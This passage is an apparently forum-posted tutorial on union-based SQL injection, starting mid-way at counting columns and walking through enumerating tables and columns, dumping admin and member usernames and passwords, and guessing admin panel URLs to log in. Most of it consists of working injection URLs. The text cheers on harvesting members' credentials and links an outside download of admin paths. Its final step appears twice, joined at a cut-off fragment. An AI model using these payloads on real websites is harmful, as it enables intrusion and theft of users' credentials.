http://www.example.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.

For eg:

http://www.example.com/index.php?id=2 order by 1--

-----------------------------------------------------------------------------

STEP 4: (Displaying the Vulnerable columns)

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.example.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Now select 1 number.
It showing 3,7. Let's take the Number 3.

-----------------------------------------------------------------------------

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

-----------------------------------------------------------------------------

STEP 6: (Finding the Table Name)

If the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the "admin " table.

If the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.

-----------------------------------------------------------------------------

STEP 7: (Finding the Column Name)

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns,like

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

-----------------------------------------------------------------------------

STEP 8: (Finding the Admin Panel)

Just try with url like:

http://www.example.com/admin.php
http://www.example.com/admin/
http://www.example.com/admin.html
http://www.example.com:2082/
etc.

If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

and finally LOG IN



---------THE END---------n Panel)

Just try with url like:

http://www.example.com/admin.php
http://www.example.com/admin/
http://www.example.com/admin.html
http://www.example.com:2082/
etc.

If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

and finally LOG IN



---------THE END---------